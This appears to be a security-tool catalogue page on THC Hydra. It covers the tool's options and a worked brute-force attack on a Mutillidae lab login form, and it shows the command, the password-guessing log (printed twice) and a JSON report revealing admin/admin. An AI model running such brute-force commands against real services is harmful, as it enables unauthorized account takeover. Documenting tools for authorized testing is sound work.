Menu
▾
▴
{ "generator": {
"software": "Hydra", "version": "v8.6", "built": "2019-11-05 16:48:17",
"server": "vulnerable.com", "service": "http-post-form", "jsonoutputversion": "1.00",
"commandline": "hydra -s 80 -l admin -P /root/SecLists/Passwords/common-passwords-win.txt -o credenciales.txt -b json -V vulnerable.com http-post-form /mutillidae/
index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:var l_loggedIn = false;"
},
"results": [
{"port": 80, "service": "http-post-form", "host": "vulnerable.com", "login": "admin", "password": "admin"}
],
"success": true,
"errormessages": [ ],
"quantityfound": 1 }
hydra-en
hydra
Phase(s):
Primary: Discovery.
Secondary: Exploitation.
Description:
Tool that performs brute force attacks mainly on services that requires authentication like HTTP, IMAP, POP3, SMB, SSH, telnet and others.
Objective:
- Identify users o passwords for several services that requires authentication through brute force attacks based on data dictionary.
Features:
Supported technologies:
- Linux/Unix
- Windows
- macOS
Operative mode: Active.
Identify users or passwords from services that require authentication.
- Supported services:
- afp, imap-ntlm, rsh, cisc, ldap2, sapr3, cisco-enable, ldap3, sip, cvs, mssql, smb, firebird, mysql, smbnt ,ftp, ncp, smtp-auth, http-get, nntp, smtp-auth-ntlm, http-head, oracle-listener, snmp, http-proxy,pcanywhere, socks5, https-get, pcnfs, ssh2, https-head, pop3, svn, https-form-get, pop3-ntlm, teamspeak, https-form-post, postgres, telnet, icq, rexec, vmauthd, imap, rlogin and vnc.
Reports:
Output reports: ✔
- TXT or JSON file containing valid passwords found.
Basic usage:
Perform a brute force attack on a HTTP service throw GET and POST method.
The following command allows performing a brute force attack to a Web resource using GET or POST HTTP method, a password wordlist and with a specific username.
hydra -s [puerto] -l [usuario] -P [diccionario] -o [output_filename] -b [output_fomart] -V [IP] [http-get-form|http-post-form] "[path:parameters:failed_message]"
Where:
- -s: Destination port.
- -l: User.
- -P: Wordlist.
- -o: Output filename.
- -b: Output format.
- -V: Verbose mode.
- [http-get-form|http-post-form]: Service and method to use.
- [IP]: Web Server IP Address.
- path: URI from Web resource.
- parameters: parameters to send.
- failed_message: Authentication error message
Execution example:
hydra -s 80 -l admin -P /root/SecLists/Passwords/common-passwords-win.txt vulnerable.com -o credenciales.txt -b json -V http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:var l_loggedIn = false;"
Where:
- -s: Target port. In this case “80”.
- -l: User to use. In this case “admin” user.
- -P: Wordlist to use.
- -o: Output filename.
- -b: Output format.
- -V: Verbose mode.
- http-get-form: Indicates the use of GET method.
- vulnerable.com: IP Address where Web Application is allocated.
- “"/mutillidae/index.php?page=login.php”: Target Web resource.
- “username=^USER^&password=^PASS^&login-php-submit-button=Login”: Parameters to send. The “^USER^” keyword specifies the place where user (-l) will be replaced. The “^PASS^” keyword specifies the place where every password will be substituted.
- “var l_loggedIn = false;”: Authentication error message from Web Application
The tool will start with brute force attack.
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-05 16:46:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 815 login tries (l:1/p:815), ~51 tries per task
[DATA] attacking http-post-form://vulnerable.com:80//mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:var l_loggedIn = false;
[ATTEMPT] target vulnerable.com - login "admin" - pass "aaa" - 1 of 815 [child 0] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "abc" - 2 of 815 [child 1] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "academia" - 3 of 815 [child 2] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "academic" - 4 of 815 [child 3] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "access" - 5 of 815 [child 4] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "ada" - 6 of 815 [child 5] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "admin" - 7 of 815 [child 6] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "adrian" - 8 of 815 [child 7] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "adrianna" - 9 of 815 [child 8] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "aerobics" - 10 of 815 [child 9] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "airplane" - 11 of 815 [child 10] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "albany" - 12 of 815 [child 11] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "albatross" - 13 of 815 [child 12] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "albert" - 14 of 815 [child 13] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alex" - 15 of 815 [child 14] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alexander" - 16 of 815 [child 15] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alf" - 17 of 815 [child 5] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "algebra" - 18 of 815 [child 2] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alias" - 19 of 815 [child 4] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "aliases" - 20 of 815 [child 1] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alice" - 21 of 815 [child 8] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alicia" - 22 of 815 [child 9] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alisa" - 23 of 815 [child 0] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alison" - 24 of 815 [child 10] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "allison" - 25 of 815 [child 3] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alpha" - 26 of 815 [child 7] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alphabet" - 27 of 815 [child 11] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "ama" - 28 of 815 [child 12] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "amadeus" - 29 of 815 [child 13] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "amanda" - 30 of 815 [child 14] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "amber" - 31 of 815 [child 15] (0/0)
[80][http-post-form] host: vulnerable.com login: admin password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-05 16:46:25
Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-05 16:46:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 815 login tries (l:1/p:815), ~51 tries per task
[DATA] attacking http-post-form://vulnerable.com:80//mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:var l_loggedIn = false;
[ATTEMPT] target vulnerable.com - login "admin" - pass "aaa" - 1 of 815 [child 0] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "abc" - 2 of 815 [child 1] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "academia" - 3 of 815 [child 2] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "academic" - 4 of 815 [child 3] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "access" - 5 of 815 [child 4] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "ada" - 6 of 815 [child 5] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "admin" - 7 of 815 [child 6] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "adrian" - 8 of 815 [child 7] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "adrianna" - 9 of 815 [child 8] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "aerobics" - 10 of 815 [child 9] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "airplane" - 11 of 815 [child 10] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "albany" - 12 of 815 [child 11] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "albatross" - 13 of 815 [child 12] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "albert" - 14 of 815 [child 13] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alex" - 15 of 815 [child 14] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alexander" - 16 of 815 [child 15] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alf" - 17 of 815 [child 5] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "algebra" - 18 of 815 [child 2] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alias" - 19 of 815 [child 4] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "aliases" - 20 of 815 [child 1] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alice" - 21 of 815 [child 8] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alicia" - 22 of 815 [child 9] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alisa" - 23 of 815 [child 0] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alison" - 24 of 815 [child 10] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "allison" - 25 of 815 [child 3] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alpha" - 26 of 815 [child 7] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "alphabet" - 27 of 815 [child 11] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "ama" - 28 of 815 [child 12] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "amadeus" - 29 of 815 [child 13] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "amanda" - 30 of 815 [child 14] (0/0)
[ATTEMPT] target vulnerable.com - login "admin" - pass "amber" - 31 of 815 [child 15] (0/0)
[80][http-post-form] host: vulnerable.com login: admin password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-05 16:46:25
Output report example.
{ "generator": {
"software": "Hydra", "version": "v8.6", "built": "2019-11-05 16:48:17",
"server": "vulnerable.com", "service": "http-post-form", "jsonoutputversion": "1.00",
"commandline": "hydra -s 80 -l admin -P /root/SecLists/Passwords/common-passwords-win.txt -o credenciales.txt -b json -V vulnerable.com http-post-form /mutillidae/
index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:var l_loggedIn = false;"
},
"results": [
{"port": 80, "service": "http-post-form", "host": "vulnerable.com", "login": "admin", "password": "admin"}
],
"success": true,
"errormessages": [ ],
"quantityfound": 1 }
Resources:
Link: https://www.thc.org/thc-hydra/
Author(s): van Hauser.
License: GNU AFFERO GENERAL PUBLIC LICENSE v3.
Version: 8.6.